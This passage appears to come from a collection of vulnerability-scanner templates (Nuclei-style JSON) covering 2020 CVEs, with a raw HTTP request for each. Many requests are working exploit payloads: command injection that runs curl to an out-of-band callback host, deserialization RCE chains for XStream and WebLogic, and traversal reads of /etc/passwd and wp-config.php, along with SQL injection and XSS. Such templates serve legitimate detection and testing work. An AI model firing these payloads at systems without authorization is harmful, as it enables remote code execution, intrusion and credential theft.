type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-24949","info":{"name":"PHP-Fusion 9.03.50 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["infusion_db.php"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36289","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin","{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rel=\\\"admin\\\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11853","info":{"name":"Micro Focus Operations Bridge Manager <=2020.05 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8772","info":{"name":"WordPress InfiniteWP <1.9.4.5 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: en-US,en;q=0.9\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\n_IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wordpress_logged_in"]},{"type":"word","part":"body","words":["<IWPHEADER>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2020-8194","info":{"name":"Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection","severity":"medium"},"requests":[{"raw":["GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\nHost: {{Hostname}}\nCookie: startupapp=st\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jnlp codebase=\"nonexistent.1337\">"]},{"type":"word","part":"header","words":["application/x-java-jnlp-file"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15148","info":{"name":"Yii 2 < 2.0.38 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="],"matchers-condition":"and","matchers":[{"type":"word","words":["total","An internal server error occurred."],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-24550","info":{"name":"EpiServer Find <13.2.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2020-27982","info":{"name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13927","info":{"name":"Airflow Experimental <1.10.11 - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/latest_runs"],"matchers":[{"type":"word","part":"body","words":["\"dag_run_url\":","\"dag_id\":","\"items\":"],"condition":"and"}]}]},{"id":"CVE-2020-11798","info":{"name":"Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/x-download","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6207","info":{"name":"SAP Solution Manager 7.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /EemAdminService/EemAdmin HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:adm=\"http://sap.com/smd/eem/admin/\"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":Envelope",":Body",":getAllAgentInfoResponse"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27735","info":{"name":"Wing FTP 6.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frame name=\"hmcontent\" src=\"javascript:alert(document.domain)\" title=\"Content frame\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24589","info":{"name":"WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npayload=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+\"http%3a//{{interactsh-url}}\">%25xxe%3b]>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Failed to install the generic artifact type"]}]}]},{"id":"CVE-2020-23972","info":{"name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"option\"\n\ncom_gmapfp\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\nContent-Type: text/html\n\nprojectdiscovery\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"no_html\"\n\nno_html\n------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n"],"payloads":{"component":["com_gmapfp","comgmapfp"]},"extractors":[{"type":"regex","regex":["window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"],"part":"body"}]}]},{"id":"CVE-2020-2733","info":{"name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/fileDownloader?sec=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ACHCJK"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12127","info":{"name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35338","info":{"name":"Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/"],"headers":{"Authorization":"Basic OnBva29u"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>WMT Server playout"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5902","info":{"name":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license","{{BaseURL}}/hsqldb%0a"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","BIG-IP release ([\\d.]+)","[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}","HSQL Database Engine Servlet"],"condition":"or"},{"type":"status","status":[200]}]},{"raw":["POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=create%20cli%20alias%20private%20list%20command%20bash\n","POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\nHost: {{Hostname}}\n\nfileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=list%20%2Ftmp%2Fnonexistent\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=delete%20cli%20alias%20private%20list\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["h3ll0_w0Rld"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14408","info":{"name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["redirectTo = '/92874';alert(document.domain)//280';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2551","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/login/LoginForm.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["10.3.6.0","12.1.3.0","12.2.1.3","12.2.1.4"],"condition":"or"},{"type":"word","part":"body","words":["WebLogic"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20285","info":{"name":"ZZcms - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /user/login.php HTTP/1.1\nHost: {{Hostname}}\nReferer: xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fromurl\" type=\"hidden\" value=\"xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35774","info":{"name":"twitter-server Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17456","info":{"name":"SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n","POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCommand=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13945","info":{"name":"Apache APISIX - Insufficiently Protected Credentials","severity":"medium"},"requests":[{"raw":["POST /apisix/admin/routes HTTP/1.1\nHost: {{Hostname}}\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\n\n{\n  \"uri\":\"/{{randstr}}\",\n  \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n  \"upstream\":{\n    \"type\":\"roundrobin\",\n    \"nodes\":{\n      \"interact.sh:80\":1\n    }\n  }\n}\n","GET /{{randstr}}?cmd=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"action\":\"create\"","\"script\":","\"node\":"],"condition":"and"},{"type":"status","status":[201]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-5410","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13379","info":{"name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1","{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cloudflare.com","dns"],"condition":"and"},{"type":"word","part":"header","words":["image/jpeg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11034","info":{"name":"GLPI <9.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=/\\/interact.sh/","{{BaseURL}}/index.php?redirect=//interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-25506","info":{"name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/system_mgr.cgi? HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nC1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n","POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-22208","info":{"name":"74cms - ajax_street.php 'x' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11\ufffd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-26217","info":{"name":"XStream <1.4.14 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n            <contentType>text/plain</contentType>\n            <is class='java.io.SequenceInputStream'>\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n                <iterator class='javax.imageio.spi.FilterIterator'>\n                  <iter class='java.util.ArrayList$Itr'>\n                    <cursor>0</cursor>\n                    <lastRet>-1</lastRet>\n                    <expectedModCount>1</expectedModCount>\n                    <outer-class>\n                      <java.lang.ProcessBuilder>\n                        <command>\n                          <string>curl</string>\n                          <string>http://{{interactsh-url}}</string>\n                        </command>\n                      </java.lang.ProcessBuilder>\n                    </outer-class>\n                  </iter>\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>start</name>\n                  </filter>\n                  <next/>\n                </iterator>\n                <type>KEYS</type>\n              </e>\n              <in class='java.io.ByteArrayInputStream'>\n                <buf></buf>\n                <pos>0</pos>\n                <mark>0</mark>\n                <count>0</count>\n              </in>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-15568","info":{"name":"TerraMaster TOS <.1.29 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /include/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24903","info":{"name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script></p>","System.Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11738","info":{"name":"WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["File Transfer","application/octet-stream","attachment; filename=\"(wp-config\\.php|passwd)\""],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:","define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27361","info":{"name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/media/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /pme/media","Parent Directory"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3580","info":{"name":"Cisco ASA/FTD Software - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/{{randstr}}/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5284","info":{"name":"Next.js <9.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/static/../server/pages-manifest.json"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\\{\"/_app\":\".*?_app\\.js\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27481","info":{"name":"Good Layers LMS Plugin <= 2.1.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"],"condition":"and"}]}]},{"id":"CVE-2020-12054","info":{"name":"WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(123);>","catch-breadcrumb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14750","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\ncmd: curl {{interactsh-url}}\nContent-Type: application/x-www-form-urlencoded\n\n_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\nfield.setAccessible(true);\nObject obj = field.get(adapter);\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\nString cmd = req.getHeader(\"cmd\");\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\nif (cmd != null) {\n    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n    res.getServletOutputStream().flush();\n    res.getWriter().write(\"\");\n}executeThread.interrupt();\n\");\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["ADMINCONSOLESESSION="]},{"type":"regex","part":"body","regex":["<html><head></head><body>(.*)</body></html>"]}]}]},{"id":"CVE-2020-2140","info":{"name":"Jenkin Audit Trail <=3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample","{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>sample"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15867","info":{"name":"Gogs 0.5.5 - 0.12.2 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-13937","info":{"name":"Apache Kylin - Exposed Configuration File","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/kylin/api/admin/config"],"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["config","kylin.metadata.url"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20982","info":{"name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["location.href='</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17453","info":{"name":"WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert('document.domain')//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20300","info":{"name":"WeiPHP 5.0 - SQL 